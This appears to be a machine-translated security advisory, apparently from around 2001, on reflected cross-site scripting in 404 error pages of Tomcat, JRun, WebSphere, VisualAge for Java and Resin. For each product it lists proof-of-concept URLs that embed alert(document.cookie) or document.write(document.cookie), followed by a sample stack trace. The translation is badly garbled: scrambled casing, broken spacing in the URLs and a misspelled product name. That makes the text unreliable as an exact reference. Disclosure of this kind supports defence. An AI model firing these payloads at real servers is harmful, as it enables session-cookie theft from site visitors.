A number of manufacturers of many vendors contain script vulnerabilities with intersections.
br> ===========================================
The product affected is: ===========================================================================================================================================================
Tomcat 3.2.1, 3.2.2-Beta, 4.0-beta
Jrun 3.0 WebSphere 3.5 FP2, 3.02, Visualage For Java 3.5 Professional
Not affected products, there is no foundation.
Vulnerability: =======
With the following URL, the JavaScript code on the browser can be executed on the server's domain.
Tomcat 3.2.1: http: // Tomcat / JSP-mapped-dir / alert (Document.cookie) .jsp
JRUN 3.0: http:// jrun / alert (document.cookie) .shtmlhttp: // jrun / alert (document.cookie) .jsphttp: // jrun / alert (Document.cookie) .thtml
WebSphere 3.5 fp2:
Http: // WebSphere / WebApp / Examples / Alert (Document.cookie)
WebSphere 3.02:
Http: // WebSphere / Alert (Document.cookie) .jsp Visualage for Java 3.5 Professional:
http: // visualage-webSphere-test-environment / alert (Document.cookie) Resin 1.2.2:
http: // reisin / alert (Document.cookie) .jsp http://www.caucho.com/Document.write (Document.cookie ).jsp These pages are shown below =========== ====================================== r 404 An Error Has Occurred While Processing Request: http: // WebSphere / WebApp / Examples / ****** Message: file not found: file: // ****** stacktrace: com.ibm.servlet.Engine.Webapp.WebapPerReport: File Not Found: File: // ****** At javax.servlet.servletException. (servletexception.java: 107) at com.ibm.websphere.servlet.error.ServleTerrorReport. (servleterrorreport.java: 31) At com.ibm.servlet.Engine .Webapp.WebapPerRreport. (WebApperReport.java: 20) at com.ibm.servlet.EnGine.Webapp.WebappdispatcherResponse.senderror (WebAppdispatcherResponse.java: 97) ... ============== ================================================================================================================================================================== ******: The JavaScript code is executed here. These Vulnerabilities and Microsoft's intersection of IIS released on August 25 last year are very similar